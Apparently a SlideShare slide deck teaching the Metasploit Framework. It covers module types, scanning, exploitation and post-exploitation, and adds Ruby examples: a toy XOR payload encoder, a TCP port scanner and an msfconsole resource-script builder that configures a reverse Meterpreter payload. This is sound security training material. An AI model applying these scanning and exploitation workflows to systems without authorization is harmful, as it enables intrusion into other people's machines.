METASPLOIT
Useful terminology:
• Vulnerability: a weakness in the target system (a bug, a misconfiguration or a design flaw) through which the system can be compromised.
• Exploit: once a vulnerability is known, an attacker takes advantage of it with code or a script, known as an exploit, that triggers the flaw and gains control of the target.
• Payload: the code the exploit delivers and runs once it succeeds, for example a shell, a Meterpreter session or a single command. Maintaining access is one use of a payload, not its definition.
WHAT IS SENT TO THE TARGET = EXPLOIT + PAYLOAD (the exploit gets you in; the payload is what runs afterwards)
• CLI: command-line interface
• GUI: graphical user interface
• MSF: Metasploit Framework
WARNINGS
Metasploit is very powerful, and very dangerous
I used VMware to isolate the operating system from other systems and from the
internet
Using it in any unauthorized way will get you fired / arrested /
deported etc.
HISTORY OF THE METASPLOIT PROJECT
• Metasploit Project
 – Started by HD Moore and collaborators
 – A community-driven project since 2003
• Rapid7
 – Maker of the NeXpose vulnerability management product
 – Acquired the project from HD Moore in 2009
• Metasploit Framework
 – The original open-source exploitation framework
THIS VIDEO INVOLVES
• Usage of Metasploit
• Social engineering
• An organization's server crashing under a DoS attack
• Honeypots
• The difference between white-hat and black-hat hackers
• Data breaches
METASPLOIT TOPICS
• Fundamentals of the Metasploit Framework
• Usage
• Scanning
• Exploitation
• Post-exploitation
• Writing Metasploit modules
WHAT IS METASPLOIT?
• Metasploit Framework, created by the Metasploit Project, is the most widely used exploitation
framework for developing, testing and running exploits. It lets penetration testers,
auditors and vulnerability assessment personnel build their own testing tooling and
exploit modules on top of it.
• It is a collaboration between the open-source community and Rapid7
• An exploitation framework written in Ruby, at version 4.9.1 when this deck was written
• It is modular
• It contains exploits, payloads, encoders, NOP generators, auxiliary modules and post modules
METASPLOIT EDITIONS
METASPLOIT VERSIONS
• 1.0 released in 2003 (Perl)
• 2.0 released in 2004 (rewritten, still Perl)
 – 2.7 released in late 2006
• 3.0 released in 2007 (rewritten in Ruby)
 – 3.2 released in late 2008
 – 3.3 released in late 2009
 – 3.4 released in early 2010
 – 3.4.1 was the most recent release when this list was compiled (the 4.x series followed; the deck itself refers to 4.9.1)
• At that point Metasploit had 567 exploits and 283 auxiliary modules (up from 551 and 261 in
v3.4); the counts have grown many times over since
VERSIONS AND BASICS
- Metasploit Framework Edition
 • The free, open-source command-line version
- Metasploit Community Edition
 • A free, web-based user interface on top of the Framework
- Metasploit Express
 • An open-core commercial edition for security teams who need to verify vulnerabilities
- Metasploit Pro
 • An open-core commercial edition for penetration testers, adding features such as auto-exploitation and reporting
- Armitage
 • A graphical attack-management front end for the Metasploit Framework that visualizes
 targets and recommends exploits
• Runs on any operating system
 - Source code for Linux / Unix / Mac OS X
 - Portable to Windows via Cygwin
• Lets anyone exploit, and often obtain root or SYSTEM on, certain machines given only an IP address
and some basic knowledge of the target
• Requires no knowledge of the underlying software bug or of the exploit's machine code
ARCHITECTURE OF METASPLOIT
WITH METASPLOIT, YOU CAN PERFORM THE FOLLOWING OPERATIONS
• Conduct basic penetration tests on small networks
• Run spot checks on the exploitability of vulnerabilities
• Discover the network or import scan data
• Browse exploit modules and run individual exploits against hosts
HIERARCHY BUILDS UP LIKE THIS
• Auxiliary modules – used for information gathering, enumeration, port scanning and
similar tasks. They also include tools for connecting to SQL databases, fuzzers, and
even modules for man-in-the-middle attacks.
• Exploit modules – deliver exploit code to a target system and hand control to a payload.
• Post modules – post-exploitation tools that run inside an existing session, such as
extracting password hashes and access tokens, taking screenshots, keylogging and
downloading files.
• Payload modules – the code that runs on the target after a successful exploit (shells,
Meterpreter, single commands); they are paired with an exploit rather than run on their own.
AUXILIARY
• An auxiliary module is, loosely, an exploit-style module that delivers no payload.
• Used for scanning, fuzzing, brute forcing and other automated tasks.
• Built from mixins: shared Ruby modules that supply, for example, TCP connection handling or the logic for iterating over many hosts.
• Launched with the run command in msfconsole (exploit modules use exploit).
ENCODERS
• Encoders transform the payload bytes so they avoid "bad characters" the target will not accept (such as NUL bytes) and so the raw payload signature changes; evading anti-virus is a side effect that was never reliable.
• Payloads are encoded, not encrypted: a small decoder stub is prepended and the key travels with it, so anyone inspecting the bytes can recover the original.
NOPS
• NOP generators produce "no operation" padding (a NOP sled) used to keep the final payload size consistent and to give execution a safe landing zone in front of the payload.
• The framework ships several NOP generators (this deck counted 10 at the time).
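To make the encoder and NOP bullets concrete, here is an added example written for this page (it is not code from the slides or from Metasploit's own encoder modules): a toy single-byte XOR encoder with a NOP sled. The sample payload bytes and the bad-character set are constructed. A real encoder such as x86/shikata_ga_nai does the same job with a polymorphic machine-code decoder stub; the point shown here is that the key is chosen only to dodge bad characters, and that decoding is the same XOR, so encoding offers no secrecy.

```ruby
# Added example for this page, not code from the slides or from Metasploit.
# A toy single-byte XOR encoder plus NOP sled, to show what an encoder module
# does: it removes "bad characters" and changes the byte pattern, and it is
# fully reversible by anyone who reads the decoder. It is not encryption.

# Bytes a typical string-copy bug will not pass through (NUL, LF, CR).
BAD_CHARS = [0x00, 0x0a, 0x0d].freeze

# Constructed sample "payload": arbitrary bytes that contain all three bad chars.
SAMPLE_PAYLOAD = [0x00, 0x31, 0xc0, 0x0a, 0x50, 0x0d, 0xeb, 0x7f].pack('C*').freeze

# 0x90 is the x86 single-byte NOP, the classic sled filler.
X86_NOP = [0x90].pack('C*').freeze

def contains_bad_chars?(blob, bad_chars = BAD_CHARS)
  blob.each_byte.any? { |b| bad_chars.include?(b) }
end

# Pick a single-byte XOR key such that neither the key (it is embedded in the
# decoder stub) nor any encoded byte is a bad character. nil if none exists.
def find_xor_key(payload, bad_chars = BAD_CHARS)
  (1..255).find do |key|
    !bad_chars.include?(key) &&
      payload.each_byte.none? { |b| bad_chars.include?(b ^ key) }
  end
end

# Encode: XOR every byte with the key. Returns [key, encoded_bytes].
def xor_encode(payload, bad_chars = BAD_CHARS)
  key = find_xor_key(payload, bad_chars)
  raise ArgumentError, 'no single-byte key avoids the bad characters' unless key
  [key, payload.each_byte.map { |b| b ^ key }.pack('C*')]
end

# Decode is the identical operation. On a real target this is what the
# prepended machine-code decoder stub does before jumping to the payload.
def xor_decode(key, encoded)
  encoded.each_byte.map { |b| b ^ key }.pack('C*')
end

# Pad the front with NOPs so the final blob has a fixed size and execution
# that lands anywhere in the sled slides forward into the decoder + payload.
def pad_with_nops(blob, total_size)
  raise ArgumentError, "blob is larger than #{total_size} bytes" if blob.bytesize > total_size
  X86_NOP * (total_size - blob.bytesize) + blob
end

if __FILE__ == $PROGRAM_NAME
  key, encoded = xor_encode(SAMPLE_PAYLOAD)
  blob = pad_with_nops(encoded, 32)
  puts "raw has bad chars:     #{contains_bad_chars?(SAMPLE_PAYLOAD)}"
  puts "key: 0x#{key.to_s(16)}  encoded: #{encoded.unpack1('H*')}"
  puts "padded (#{blob.bytesize} bytes): #{blob.unpack1('H*')}"
  puts "encoded has bad chars: #{contains_bad_chars?(blob)}"
  puts "round trip ok:         #{xor_decode(key, encoded) == SAMPLE_PAYLOAD}"
end
```

Note that the search runs over all 255 non-zero keys and can fail: a payload that contains every byte value has no single-byte XOR key that clears a bad character, which is exactly why real encoders use multi-byte or additive-feedback schemes.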
SCANNING USING METASPLOIT
• Discovery through vulnerability scanning
Vulnerability scanning lets you quickly sweep a target IP range for known
vulnerabilities, giving the penetration tester a quick idea of which attacks are
worth attempting.
• Port scanning
A port scan is a series of probes sent to a host to learn which network services,
each typically associated with a "well-known" port number, it offers. Port scanning
is a staple of attackers and testers alike because it shows where to probe for weaknesses.
HOW A DISCOVERY SCAN WORKS
A discovery scan can be divided into four distinct phases:
• Ping scan – determines whether the hosts are online
• Port scan – identifies the open ports and the services listening on them
• OS and version detection – fingerprints service versions and the operating system
from how the host responds to the probes
• Data import – collects all the data, creates a report and imports the data into
the project (the workspace database)
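The four phases above, as an added example written for this page (it is not Metasploit's scanner; in msfconsole the same work is done by db_nmap or auxiliary/scanner/portscan/tcp). The "ping" phase uses a TCP connect attempt instead of ICMP so it needs no root, and the only target is a constructed local service that greets with an SSH-style banner, so the script runs offline.

```ruby
require 'socket'
require 'timeout'

# Added example for this page, not Metasploit's own scanner. A minimal TCP
# discovery scan that walks the four phases: ping, port scan, version
# detection and data import. The target and banner below are constructed.

# Phase 1, "ping": a TCP connect attempt instead of ICMP (no root needed).
# Any answer at all, including "connection refused", proves the host is up.
def host_alive?(host, probe_port, timeout = 1.0)
  Timeout.timeout(timeout) { TCPSocket.new(host, probe_port).close }
  true
rescue Errno::ECONNREFUSED
  true
rescue Timeout::Error, SystemCallError
  false
end

# Phase 2: port scan by full TCP connect, keeping only ports that accept.
def open_ports(host, ports, timeout = 0.5)
  ports.select do |port|
    begin
      Timeout.timeout(timeout) { TCPSocket.new(host, port).close }
      true
    rescue Timeout::Error, SystemCallError
      false
    end
  end
end

# Phase 3: version detection by banner grab. Services such as SSH, SMTP and
# FTP speak first, so we just read whatever arrives within the timeout.
def grab_banner(host, port, timeout = 1.0)
  sock = TCPSocket.new(host, port)
  readable = IO.select([sock], nil, nil, timeout)
  readable ? sock.readpartial(256).strip : ''
rescue SystemCallError, EOFError
  ''
ensure
  sock&.close
end

# Phase 4, "data import": one structured record per host, the shape a
# report or the workspace database would hold.
def discovery_scan(host, ports)
  dead = { host: host, alive: false, services: [] }
  return dead if ports.empty? || !host_alive?(host, ports.first)
  services = open_ports(host, ports).map do |port|
    { port: port, banner: grab_banner(host, port) }
  end
  { host: host, alive: true, services: services }
end

# Constructed local target so the example runs offline: a throwaway service
# on an ephemeral port that greets every client with the given banner.
# Returns [port, server_socket, accept_thread].
def start_fake_service(banner)
  server = TCPServer.new('127.0.0.1', 0)
  thread = Thread.new do
    begin
      loop do
        client = server.accept
        client.write(banner)
        client.close
      end
    rescue IOError
      nil # server socket closed, stop accepting
    end
  end
  [server.addr[1], server, thread]
end

if __FILE__ == $PROGRAM_NAME
  port, server, thread = start_fake_service("SSH-2.0-ExampleSSH_1.0\r\n")
  p discovery_scan('127.0.0.1', [port, port + 1])
  thread.kill
  server.close
end
```

A connect scan like this completes the TCP handshake, so it shows up in the target's service logs; Metasploit's own portscan/syn module and nmap's default SYN scan avoid that but need raw-socket privileges.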
EXPLOITATION
An exploit is the use of software, data or commands to take advantage of a
weakness in a computer system or program in order to carry out a malicious
goal, such as a denial of service, dropping a trojan, worm or virus, or simply
taking control. The weakness can be a bug, a misconfiguration or a design flaw.
The process is known as exploitation.
The five steps in the exploitation process are:
• scanning the target
• selecting an exploit
• selecting a payload
• encoding the exploit
• launching the attack
• Scanning the target
Use port scanning and vulnerability scanning, with tools such as nmap, Nessus or
Metasploit's own scanner modules, to find live hosts, services and candidate vulnerabilities.
• Selecting the exploit
Choose the exploit module that matches the vulnerable service and version found by the scan.
• Selecting the payload
The payload is the code that runs on the target once the exploit succeeds; it must be
compatible with the exploit's platform and architecture.
• Encoding the exploit
Encoding is how Metasploit transforms the payload before packaging it with the exploit. It is
usually handled automatically; an encoder is chosen explicitly via the set command only when needed.
• Launching the attack
Once all options are set and reviewed, the tester simply runs the exploit.
EXPLOITING VULNERABILITIES:
Metasploit offers two methods you can use to perform exploitation: auto-exploitation and manual exploitation.
Auto-exploitation: the auto-exploitation feature (available in the commercial editions) cross-references open services, vulnerability references and fingerprints to find matching exploits. Its simple goal is to get a session as quickly as possible by leveraging the data Metasploit already holds for the target hosts.
Manual exploitation: manual exploitation provides a more targeted and methodical approach to exploiting vulnerabilities. This method is particularly useful when there is a specific vulnerability you want to exploit.
Payload Type: specifies the kind of payload the exploit will deliver to the target.
Choose one of the following payload types:
• Command: a command-execution payload (a plain shell) that lets you run
commands on the remote machine.
• Meterpreter: an advanced in-memory payload that provides an interactive command
line and can load extensions on the fly, without writing files to disk.
Connection Type: specifies how your Metasploit instance and the payload connect.
Choose one of the following connection types:
• Auto: uses a bind connection when your own system is detected to be behind NAT
(and so cannot receive call-backs); otherwise, a reverse connection is used.
• Bind: the payload listens on the target and Metasploit connects in. This needs an
inbound path to the target, so it fails when the target sits behind a firewall or NAT
gateway that blocks inbound connections; it is the option to use when your own system
cannot accept inbound connections.
• Reverse: the payload connects back from the target to LHOST:LPORT. This is the usual
choice, and the right one if your system is unable to initiate connections to the targets,
because a target behind a firewall or NAT can typically still make outbound connections.
• LHOST: the address a reverse payload calls back to. It must be reachable from the
target, which is not simply your local interface address if you are behind NAT.
• LPORT: the port the handler listens on for reverse connections (for a bind payload,
the port the payload listens on).
• RHOST: the target address (RHOSTS in current releases).
• RPORT: the remote port you want to attack.
• Target Settings: the target operating system and version, which selects the
exploit's return addresses and offsets.
• Exploit Timeout: the timeout in minutes.
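The five-step workflow and the payload and connection settings above, turned into an msfconsole resource script by an added example written for this page (not code from the slides or from Metasploit). It applies the checks a tester wants before typing exploit: a reverse payload needs an LHOST the target can route to, a bind payload needs no LHOST at all, and the RHOST and ports must be sane. The exploit path used in the demo is a hypothetical placeholder; the payload names are real Metasploit payloads, and the addresses come from the TEST-NET-1 documentation range.

```ruby
require 'ipaddr'

# Added example for this page, not code from the slides or from Metasploit.
# Builds an msfconsole resource script for steps 2-5 of the workflow (scanning
# is done beforehand, e.g. with db_nmap) and validates the plan first.
# Run the output with:  msfconsole -q -r plan.rc

ExploitPlan = Struct.new(:exploit, :payload, :rhost, :rport, :lhost, :lport, :encoder,
                         keyword_init: true)

def reverse_payload?(payload)
  payload.to_s.include?('reverse_')
end

def bind_payload?(payload)
  payload.to_s.include?('bind_')
end

def valid_ip?(addr)
  return false unless addr.is_a?(String)
  IPAddr.new(addr)
  true
rescue ArgumentError # IPAddr::InvalidAddressError is an ArgumentError
  false
end

def valid_port?(port)
  port.is_a?(Integer) && port.between?(1, 65_535)
end

# Returns a list of problems; an empty list means the plan is consistent.
def validate_plan(plan)
  problems = []
  problems << 'exploit must be a module path starting with exploit/' unless plan.exploit.to_s.start_with?('exploit/')
  problems << 'RHOST must be a valid IP address' unless valid_ip?(plan.rhost)
  problems << 'RPORT must be 1-65535' unless valid_port?(plan.rport)
  problems << 'LPORT must be 1-65535' unless valid_port?(plan.lport)
  if reverse_payload?(plan.payload)
    # The target initiates the connection, so LHOST must be an address the
    # target can route to, not merely our interface address behind a NAT.
    problems << 'reverse payload needs LHOST, an address the target can reach' unless valid_ip?(plan.lhost)
  elsif bind_payload?(plan.payload)
    # We connect in, so LHOST is meaningless; a value here signals confusion.
    problems << 'bind payload does not use LHOST; LPORT is the port the payload listens on' if plan.lhost
  else
    problems << "cannot tell bind from reverse in payload '#{plan.payload}'"
  end
  problems
end

def build_resource_script(plan)
  problems = validate_plan(plan)
  raise ArgumentError, problems.join('; ') unless problems.empty?
  lines = ["use #{plan.exploit}",          # step 2: select the exploit
           "set PAYLOAD #{plan.payload}",  # step 3: select the payload
           "set RHOSTS #{plan.rhost}",     # RHOST on the 4.x releases this deck describes
           "set RPORT #{plan.rport}",
           "set LPORT #{plan.lport}"]
  lines << "set LHOST #{plan.lhost}" if reverse_payload?(plan.payload)
  lines << "set ENCODER #{plan.encoder}" if plan.encoder # step 4, only when the default is not wanted
  lines << 'show options' # review everything before firing
  lines << 'check'        # many modules can confirm the vuln without sending the payload
  lines << 'exploit -j'   # step 5, as a background job so the console stays usable
  lines.join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  plan = ExploitPlan.new(exploit: 'exploit/example/placeholder_service', # hypothetical module path
                         payload: 'windows/meterpreter/reverse_tcp',
                         rhost: '192.0.2.10', rport: 445,
                         lhost: '192.0.2.1', lport: 4444)
  puts build_resource_script(plan)
end
```

The validation encodes the bind/reverse distinction from the settings list: for a reverse payload the tester's own reachability is the thing to verify, for a bind payload it is the target's. Keeping that check in front of the exploit command is cheaper than a session that never arrives.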
POST EXPLOITATION
• Post-exploitation is an important phase of a penetration test: it is where the tester
gathers information from, and extends control over, the system just exploited. Many
penetration testers use the Metasploit Framework only for the initial exploitation,
but the framework also provides post modules and Meterpreter extensions for
post-exploitation on a variety of systems.
• Meterpreter can migrate into another process (ideally one that is long-lived, stable or
running with higher privileges) and continue its work from there.
• Through Meterpreter the tester acts with the privileges of the compromised user or
process, and can escalate from there.
• Screenshots, keylogging and much more are available by loading extensions:
 - espia (screen capture)
 - incognito (token impersonation)
 - pivot
 - sniffer (packet capture on the target)
 - priv (privilege escalation, hash dumping, timestamp tampering)
 - stdapi (loaded by default: file system, network, process and UI commands)
• What else can be done in post-exploitation? Some examples:
 - keylogging
 - screenshots
 - viewing the live screen
 - accessing the webcam
 - taking control of keyboard and mouse
 - deleting users
 - pivoting into other networks through the compromised host
 - VM detection, and much more
• Advantages
Open source
Frequently updated
• Disadvantages
Difficult to learn
Exploits can crash the target, or your own system, if used carelessly
Requires deep knowledge for exploit development
IT IS USEFUL FOR
• Future penetration testers
• Vulnerability assessment personnel
• Security engineers
• Security researchers
• Auditors
• Programmers
• Any IT professional who has to test regularly to maintain compliance requirements
• Any IT professional who runs scheduled testing of security infrastructure as a best practice
SUMMARY
• Metasploit is very easy to use, and very powerful
• The web interface lets scans be launched from any system, on any operating
system
• Evidence is frequently left behind on the target: payload files on disk, crashed
services, event-log entries and connections in network logs, so record what you did and clean up
• Signature-based IDS/IPS and anti-virus detect stock Metasploit exploits and payloads,
so stealth should not be assumed
• The public framework contains only public, well-known exploits: there are no 0-days in
it, and a fully patched target is not affected by them
NOTE
• Never misuse it for personal purposes
• Use it wisely, and only against systems you are authorized to test
• Understand a module before running it
• Practise in isolated virtual machines
THANK YOU
Metasploit

More Related Content

What's hot

Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
Priyanka Aash
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
Yow connected developing secure i os applications
Yow connected   developing secure i os applicationsYow connected   developing secure i os applications
Yow connected developing secure i os applications
mgianarakis
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
karanwayne
 

What's hot (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Yow connected developing secure i os applications
Yow connected   developing secure i os applicationsYow connected   developing secure i os applications
Yow connected developing secure i os applications
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
 

Similar to Metasploit

Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Metasploit primary
Metasploit primaryMetasploit primary
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Eliz seminar
Eliz seminar Eliz seminar
Eliz seminar
henelpj
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
Setia Juli Irzal Ismail
 
Ethical hacking basics
Ethical hacking basicsEthical hacking basics
Ethical hacking basics
BHAWESH RAJPAL
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
GTU
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploitwozgeass
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
Prashant Chopra
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 

Similar to Metasploit (20)

Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Eliz seminar
Eliz seminar Eliz seminar
Eliz seminar
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
 
Ethical hacking basics
Ethical hacking basicsEthical hacking basics
Ethical hacking basics
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
Metapwn
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 

Recently uploaded

Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
khadija278284
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
Vladimir Samoylov
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Sebastiano Panichella
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law:  Static vs. Dynamic Abusers0x01 - Newton's Third Law:  Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
OWASP Beja
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
IP ServerOne
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
Access Innovations, Inc.
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
Howard Spence
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Matjaž Lipuš
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Orkestra
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
OECD Directorate for Financial and Enterprise Affairs
 
International Workshop on Artificial Intelligence in Software Testing
